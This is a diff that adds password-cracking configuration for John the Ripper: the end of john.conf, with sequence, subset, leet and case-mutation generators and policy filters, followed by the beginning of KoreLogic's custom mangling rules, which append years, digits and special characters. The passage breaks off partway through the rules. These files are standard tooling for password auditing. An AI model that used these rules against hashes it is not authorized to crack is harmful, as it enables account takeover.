+# Try sequences of digits (range: '0' - '9').
+#
+# Aditional comments can be found in the
+# section [List.External_base:Sequence]
+#
+# This external mode is thoroughly commented,
+# to make it easier to copy and adjust it as needed.
+[List.External:Sequence_0-9]
+.include [List.External_base:Sequence]
+void init()
+{
+	// Adjust the following 4 variables if you want to define
+	// a different external mode.
+
+	// This is the start character for the generated sequence
+	// if "from" is smaller than "to", the increment from
+	// first to second character ... will be positive ("0123456789").
+	// Otherwise, it will be negative ("987654321").
+	from = '0';
+	to = '9';
+
+	// minimum length of the sequence
+	// make sure it is not larger than the number of different characters
+	// in the range between "from" and "to" specified above
+	minlength = 2;
+
+	// start increment for generating the sequence, usually 1
+	// if it is larger than 1, you need even more characters
+	// in the range between "from" and "to"
+	// Don't specify a negative value here.
+	// If you want to generate sequences like "zyxwvu" or "86420",
+	// adjust "from" and "to" so that "from" is larger than "to".
+	// (A start increment of 0 is also possible, in that case the first
+	// sequences will be candidates which just repeat the same character.)
+	inc = 1;
+
+	// For copied external modes, no further changes should be required
+	// in the statements following this comment
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		// We have to create sequences which decrement the previous character
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_a-z]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'a';
+	to = 'z';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z'), but reversed
+# ("zxywvu").
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_z-a]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'z';
+	to = 'a';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_printable_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = '~';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~'),
+# but decrementing characters ("fedcba") instead of incrementing.
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_reversed_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = '~';
+	to = ' ';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of characters (range: space - 0xff).
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = 0xff;
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+
+# Generate candidate passwords from many small subsets of characters from a
+# much larger full character set.  This will test for passwords containing too
+# few different characters.  As currently implemented, this code will produce
+# some duplicates, although their number is relatively small when the maximum
+# number of different characters (the maxdiff setting) is significantly lower
+# than the maximum length (the maxlength setting).  Nevertheless, you may want
+# to pass the resulting candidate passwords through "unique" if you intend to
+# test them against hashes that are salted and/or of a slow to compute type.
+[List.External:Subsets]
+int minlength;		// Minimum password length to try
+int maxlength;		// Maximum password length to try
+int startdiff;		// Initial number of characters in a subset to try
+int maxdiff;		// Maximum number of characters in a subset to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int subset[0x100], c0;	// Current subset
+int subcount;		// Number of characters in the current subset
+int subid[0x100];	// Indices into charset[] of characters in subset[]
+int charset[0x100];	// Full character set
+int charcount;		// Number of characters in the full charset
+
+void init()
+{
+	int i, c;
+
+	// Minimum password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	// Maximum password length to try, must be at least same as minlength
+	// This external mode's default maximum length can be adjusted
+	// using --max-length= on the command line
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 8;
+
+	// "cipher_limit" is the variable which contains the format's
+	// maximum password length
+	if (maxlength > cipher_limit)
+		maxlength = cipher_limit;
+
+	startdiff = 1;	// Initial number of different characters to try
+	maxdiff = 3;	// Maximum number of different characters to try
+
+/* This defines the character set */
+	i = 0;
+	c = 0x20;
+	while (c <= 0x7e)
+		charset[i++] = c++;
+
+	if (maxdiff > (charcount = i))
+		maxdiff = i;
+	if (maxdiff > maxlength)
+		maxdiff = maxlength;
+
+/*
+ * Initialize the variables such that generate() gets to its "next subset"
+ * code, which will initialize everything for real.
+ */
+	subcount = (i = startdiff) - 1;
+	while (i--)
+		subid[i] = charcount;
+	subset[0] = c0 = 0;
+	last = maxlength - 1;
+	lastid = -1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = subset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = subset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+		return;
+	}
+
+/* Next subset */
+	if (subcount) {
+		int j;
+		i = subcount - 1;
+		j = charcount;
+		while (++subid[i] >= j) {
+			if (i--) {
+				j--;
+				continue;
+			}
+			subid[i = 0] = 0;
+			subset[++subcount] = 0;
+			break;
+		}
+	} else {
+		subid[i = 0] = 0;
+		subset[++subcount] = 0;
+	}
+	subset[i] = charset[subid[i]];
+	while (++i < subcount)
+		subset[i] = charset[subid[i] = subid[i - 1] + 1];
+
+	if (subcount > maxdiff) {
+		word = 0;		// Done
+		return;
+	}
+
+/*
+ * We won't be able to fully use the subset if the length is smaller than the
+ * character count.  We assume that we've tried all smaller subsets before, so
+ * we don't bother with such short lengths.
+ */
+	if (minlength < subcount)
+		last = subcount - 1;
+	else
+		last = minlength - 1;
+	c0 = subset[0];
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = 0;
+	word[i] = 0;
+}
+
+# Simple password policy matching: require at least one digit.
+[List.External:AtLeast1-Simple]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+		if (c >= '0' && c <= '9')
+			return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# The same password policy implemented in a more efficient and more generic
+# fashion (easy to expand to include other "sufficient" characters as well).
+[List.External:AtLeast1-Generic]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0; // Terminate the loop in filter() on NUL
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 1; // Continue looping in filter() on most chars
+
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 0; // Terminate the loop in filter() on digits
+}
+
+void filter()
+{
+	int i;
+
+	i = -1;
+	while (mask[word[++i]])
+		continue;
+	if (word[i])
+		return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# An efficient and fairly generic password policy matcher.  The policy to match
+# is specified in the check at the end of filter() and in mask[].  For example,
+# lowercase and uppercase letters may be treated the same by initializing the
+# corresponding mask[] elements to the same value, then adjusting the value to
+# check "seen" for accordingly.
+[List.External:Policy]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0x100;
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 0x200;
+
+	c = 'a';
+	while (c <= 'z')
+		mask[c++] = 1;
+	c = 'A';
+	while (c <= 'Z')
+		mask[c++] = 2;
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 4;
+}
+
+void filter()
+{
+	int i, seen;
+
+/*
+ * This loop ends when we see NUL (sets 0x100) or a disallowed character
+ * (sets 0x200).
+ */
+	i = -1; seen = 0;
+	while ((seen |= mask[word[++i]]) < 0x100)
+		continue;
+
+/*
+ * We should have seen at least one character of each type (which "add up"
+ * to 7) and then a NUL (adds 0x100), but not any other characters (would
+ * add 0x200).  The length must be 8.
+ */
+	if (seen != 0x107 || i != 8)
+		word = 0; // Does not conform to policy
+}
+
+# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
+# for speed, not for size nor simplicity.  The primary optimization trick is to
+# compute the length and four sums in parallel (in two SIMD'ish variables).
+# Then whether the length is even or odd determines which two of the four sums
+# are actually used.  Checks for non-digits and for NUL are packed into the
+# SIMD'ish bitmasks as well.
+[List.External:AppendLuhn]
+int map1[0x100], map2[0x1fff];
+
+void init()
+{
+	int i;
+
+	map1[0] = ~0x7fffffff;
+	i = 1;
+	while (i < 0x100)
+		map1[i++] = ~0x7effffff;
+	i = -1;
+	while (++i < 10)
+		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
+	i = -1;
+	while (++i < 0x1fff) {
+		if (i % 10)
+			map2[i] = '9' + 1 - i % 10;
+		else
+			map2[i] = '0';
+	}
+}
+
+void filter()
+{
+	int i, o, e;
+
+	i = o = e = 0;
+	while ((o += map1[word[i++]]) >= 0) {
+		if ((e += map1[word[i++]]) >= 0)
+			continue;
+		if (e & 0x01000000)
+			return; // Not all-digit, leave unmodified
+		word[i--] = 0;
+		word[i] = map2[(e & 0xfff) + (o >> 12)];
+		return;
+	}
+	if (o & 0x01000000)
+		return; // Not all-digit, leave unmodified
+	word[i--] = 0;
+	word[i] = map2[(o & 0xfff) + (e >> 12)];
+}
+
+# Trivial Rotate function, which rotates letters in a word
+# by a given number of places (like 13 in case of ROT13).
+# Words which don't contain any letters (and thus wouldn't be changed
+# by this filter) are skipped, because these unchanged words probably
+# should have been tried before trying a mangled version.
+[List.External_base:Filter_Rotate]
+
+int rot; // The number of places to rotate each letter in a word
+
+void filter()
+{
+	int i, j, c;
+
+	i = 0;
+	j = 0; // j counts the number of changed characters
+
+	while (c = word[i]) {
+		if (c >= 'a' && c <= 'z') {
+			c = c - 26 + rot;
+			if (c < 'a') c += 26;
+			word[i] = c;
+			j++;
+		} else if (c >= 'A' && c <= 'Z' ) {
+			c = c - 26 + rot;
+			if (c < 'A') c += 26;
+			word[i] = c;
+			j++;
+		}
+		i++;
+	}
+	if (j == 0)
+		// Nothing changed. Reject this word.
+		word = 0;
+}
+
+# ROT13 Example
+[List.External:Filter_ROT13]
+.include [List.External_base:Filter_Rotate]
+void init()
+{
+	// Just in case someone wants to "rotate" by other values,
+	// adjust the value of the rot variable
+	// (may be in a copied external mode):
+	// 	13: "abcABCxyzXYZ" -> "nopNOPklmKLM"
+	// 	 1: "abcABCxyzXYZ" -> "bcdBCDyzaYZA"
+	// 	25: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// 	-1: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// and so on
+	// Allowed range: -25 <= rot <= -1, or 1 <= rot <= 25
+	rot = 13;
+
+	// Don't change the following statement.
+	// It is supposed to "sanitize" the value to be in the
+	// range
+	rot = (rot + 26) % 26;
+}
+
+# Trivial parallel processing example (obsoleted by the "--node" option)
+[List.External:Parallel]
+/*
+ * This word filter makes John process some of the words only, for running
+ * multiple instances on different CPUs.  It can be used with any cracking
+ * mode except for "single crack".  Note: this is not a good solution, but
+ * is just an example of what can be done with word filters.
+ */
+
+int node, total;			// This node's number, and node count
+int number;				// Current word number
+
+void init()
+{
+	node = 1; total = 2;		// Node 1 of 2, change as appropriate
+	number = node - 1;		// Speedup the filter a bit
+}
+
+void filter()
+{
+	if (number++ % total)		// Word for a different node?
+		word = 0;		// Yes, skip it
+}
+
+# Interrupt the cracking session after "max" words tried
+[List.External:AutoAbort]
+int max;				// Maximum number of words to try
+int number;				// Current word number
+
+void init()
+{
+	max = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (++number > max)
+		abort = 1;		// Interrupt the cracking session
+}
+
+# Print the status line after every "interval" words tried
+[List.External:AutoStatus]
+int interval;				// How often to print the status
+int number;				// Current word number
+
+void init()
+{
+	interval = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (number++ % interval)
+		return;
+	status = 1;			// Print the status line
+}
+
+#
+# Reference example hybrid-mode external. same as jtr-rule: $[0-9]$[0-9]
+# this format is to be used similar to a filter, in that it requires some
+# other word generator (markov, wordlist, etc).  However, this type external
+# will get new() called with each word, and then have next() called, until
+# the word[0]=0 is seen (meaning all candidates for the base word have been
+# generated.  Prior to new() or restore(), word[] is the 'base' word.
+# if the script is able to properly resume, then it should set the global
+# variable hybrid_total to the count of candidates that will be generated
+# for this word (in new() / restore(), then in the body of restore() there
+# is a global variable set 'hybrid_resume' that was the prior number of
+# canidates generated for this base-word.  Resume should start at the NEXT
+# If the script is not able to easily resume, then simply do NOT set the
+# global hybrid_total to anything either function.  JtR will 'still' resume
+# propery, but it will do so by calling new()/next()/next().../next() until
+# back to the proper resume location.
+#
+# script changed to append a _ character before the number, each time within
+# the next() function. Done this way to better validate that -restore within
+# jtr is working properly.
+#
+[List.External:Hybrid_example]
+/* static vars for the script */
+int cnt, length, total;
+
+void init()
+{
+	/* in this simple example, we always generate 100 candidates per word */
+	total = 100;/* this is a VERY simple example */
+}
+
+/* new word */
+void new()
+{
+	/* get the word length) */
+	length = 0; while (word[length++]) ; --length;
+
+	/*
+	 * If this was a more complex script, we would compute total candidates
+	 * at this location, if we can. If we can not compute total candidates
+	 * then it is likely we can not resume 'easily', so if that is the
+	 * case, we would simply set hybrid_total to -1, or do nothing, since
+	 * do_external_hybrid_crack() sets it to -1 before calling this function.
+	 */
+	 hybrid_total = total;
+
+	/* Reset or counter for THIS word. */
+	cnt = 0;
+
+	/*
+	 * word will be too long to be used, or too short to be used. If so
+	 * then set hybrid_total to 0 and this entire word will be skipped.
+	 */
+	if (req_minlen > length - 2 || (req_maxlen && req_maxlen < length + 2))
+		hybrid_total = 0;
+}
+
+void next()
+{
+	/* in this simple script, if cnt is 100, this word is DONE */
+	if (cnt == 100) {
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	word[length++] = '_';
+	word[length  ] = '0' + cnt / 10;
+	word[length+1] = '0' + cnt % 10;
+	word[length+2] = 0;
+	++cnt;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+	length = 0; while (word[length++]) ; --length;
+
+	/* for this simple script, simply setting cnt resumes */
+	cnt = hybrid_resume + 1; if (cnt > 100) cnt=100;
+	i = 0;
+	while (i++ < cnt) word[length++] = '_';
+	word[length] = 0;
+
+	/* tell john that we have properly 'resumed', by setting a 'proper' total */
+	hybrid_total = total;
+}
+
+# External hybrid 'leet code
+[List.External:Leet]
+/*
+ * 1337 language in this script:
+ *   a -> a4@
+ *   b -> b8
+ *   e -> e3
+ *   g -> g9
+ *   i -> i1!
+ *   l -> l1
+ *   o -> o0
+ *   s -> s$5
+ *   t -> t7
+ */
+
+int rotor[626]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int max_mangle_letters;
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	/* note, 3^10 is 59k so aaaaaaaaaa will produce that many words! */
+	max_mangle_letters = 10; /* only mangle 10 characters max */
+	max_mangle = 4000; /* Stop building new letters if our count goes over this value */
+	original_word = 0;
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle_letters && hybrid_total < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		if (word[wlen] == 'a') {
+			rotor[rotor_off++] = 'a';
+			rotor[rotor_off++] = '4';
+			rotor[rotor_off++] = '@';
+		}
+		else if (word[wlen] == 'b') {
+			rotor[rotor_off++] = 'b';
+			rotor[rotor_off++] = '8';
+		}
+		else if (word[wlen] == 'e') {
+			rotor[rotor_off++] = 'e';
+			rotor[rotor_off++] = '3';
+		}
+		else if (word[wlen] == 'g') {
+			rotor[rotor_off++] = 'g';
+			rotor[rotor_off++] = '9';
+		}
+		else if (word[wlen] == 'i') {
+			rotor[rotor_off++] = 'i';
+			rotor[rotor_off++] = '1';
+			rotor[rotor_off++] = '!';
+		}
+		else if (word[wlen] == 'l') {
+			rotor[rotor_off++] = 'l';
+			rotor[rotor_off++] = '1';
+		}
+		else if (word[wlen] == 'o') {
+			rotor[rotor_off++] = 'o';
+			rotor[rotor_off++] = '0';
+		}
+		else if (word[wlen] == 's') {
+			rotor[rotor_off++] = 's';
+			rotor[rotor_off++] = '$';
+			rotor[rotor_off++] = '5';
+		}
+		else if (word[wlen] == 't') {
+			rotor[rotor_off++] = 't';
+			rotor[rotor_off++] = '7';
+		}
+		if (rotor_off > rotor_ptr[wlen]) {
+			rotor_cnt[wlen] = rotor_off-rotor_ptr[wlen];
+			hybrid_total *= rotor_cnt[wlen];
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# External hybrid CaSE mutation code
+[List.External:Case]
+
+int rotor[251]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
+	original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen, ch;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		ch = word[wlen];
+		if (ch >= 'A' && ch <= 'Z') {
+			ch += 0x20;
+			word[wlen] = ch;
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+		}
+		if (ch >= 'a' && ch <= 'z') {
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+			rotor_cnt[wlen] = 2;
+			hybrid_total *= 2;
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# Alternate hybrid external 'leet' mode (HybridLeet)
+.include <hybrid.conf>
+
+# dumb-force UTF-16, in an external file
+.include <dumb16.conf>
+
+# dumb-force UTF-32, in an external file
+.include <dumb32.conf>
+
+# repeats UTF-16, in an external file
+.include <repeats16.conf>
+
+# repeats UTF-32, in an external file
+.include <repeats32.conf>
+
+# Dynamic ($dynamic_n$) scripting code, in an external file
+.include <dynamic.conf>
+
+# Regex alphabets
+.include <regex_alphabets.conf>
+
+# NOTE, this file (john.local.conf) is deprecated. If you had any modified logic in this
+# file, please create and move it to john-local.conf.  The file simply can be renamed to
+# the new john-local.conf if you so choose.
+.include '$JOHN/john.local.conf'
+
+# include john-local.conf (This file can be created by user, to override defaults in this john.conf file)
+.include '$JOHN/john-local.conf'
+
+# include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)
+.include './john-local.conf'
+
+# End of john.conf file.
+# Keep this comment, and blank line above it, to make sure a john-local.conf
+# that does not end with \n is properly loaded.
@@ -0,0 +1,522 @@
+####################################################################
+# KoreLogic Custom John the Ripper Rules:
+####################################################################
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:PrependSeason]
+a6 A0"[Ss$][uU][mM][mM][eE3][rR]"
+a6 A0"[Ww][iI|][nN][tT+][eE3][rR]"
+a4 A0"[Ff][aA][lL][lL]"
+a6 A0"[Ss][pP][rR][iI][nN][gG]"
+a6 A0"[Aa][uU][tT][uU][mM][nN]"
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:AppendSeason]
+a6 Az"[Ss$][uU][mM][mM][eE3][rR]"
+a6 Az"[Ww][iI|][nN][tT+][eE3][rR]"
+a6 Az"[Ff][aA][lL][lL]"
+a6 Az"[Ss][pP][rR][iI][nN][gG]"
+a6 Az"[Aa][uU][tT][uU][mM][nN]"
+
+[List.Rules:PrependHello]
+a5 A0"[hH][eE][lL][lL][oO0]"
+
+[List.Rules:PrependYears]
+a4 A0"20[0-1][0-9]"
+a4 A0"19[3-9][0-9]"
+
+# Notice: Your wordlist should likely be all lowercase - or you are wasting work
+[List.Rules:AppendYears]
+-[c:] a4 \p[c:] Az"19[0-9][0-9]"
+-[c:] a4 \p[c:] Az"20[01][0-9]"
+
+# Notice how we
+# 1) do caps first b/c they are more common in 'complex' environments
+# 2) Do !$@#%. first b/c they are the most common special chars
+[List.Rules:AppendCurrentYearSpecial]
+-[c:] a5 \p[c:] Az"201[0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4Num]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append5Num]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append6Num]
+-[c:] a6 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendSpecial3num]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:AppendSpecial4num]
+-[c:] a5 \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]"
+-[c:] a5 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q
+
+[List.Rules:PrependCAPCAPAppendSpecial]
+a3 A0"[A-Z][A-Z]" $[!$@#%.]
+a3 A0"[A-Z][A-Z]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNumAppendSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[!$@#%.]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNum]
+-[c:] a2 \p[c:] A0"[0-9][0-9]"
+
+[List.Rules:PrependNumNumNum]
+-[c:] a3 \p[c:] A0"[0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumNumNum]
+-[c:] a4 \p[c:] A0"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Prepend2NumbersAppend2Numbers]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecial]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialNumberNumber]
+-[c:] a3 \p[c:] Az"[!$@#%.][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+
+[List.Rules:AppendSpecialNumberNumberNumber]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:PrependSpecialSpecialAppendNumber]
+-[c:] a3 \p[c:] A0"[!$@#%.][!$@#%.]" $[0-9]
+-[c:] a3 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q $[0-9]
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+-[c:] a4 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9]"
+-[c:] a4 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+-[c:] a5 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]"
+-[c:] a5 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]"
+
+[List.Rules:Append2Letters]
+a2 Az"[a-z][a-z]"
+-c a2 Az"[A-Z][A-Z]"
+-c a2 Az"[a-z][A-Z]"
+-c a2 Az"[A-Z][a-z]"
+
+[List.Rules:Prepend4NumAppendSpecial]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" $[!$@#%.]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4NumSpecial]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append3NumSpecial]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][!$@#%.]"
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append2NumSpecial]
+-[c:] a3 \p[c:] Az"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+# Append numbers - but limit the total length.
+[List.Rules:AddJustNumbers]
+-[c:] <* >1 \p[c:] $[0-9]
+-[c:] <* >1 \p[c:] ^[0-9]
+-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
+-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
+-[c:] a3 >1 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 >1 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:DevProdTestUAT]
+-\r[::cc] a3 A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a3 A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
+
+[List.Rules:PrependAndAppendSpecial]
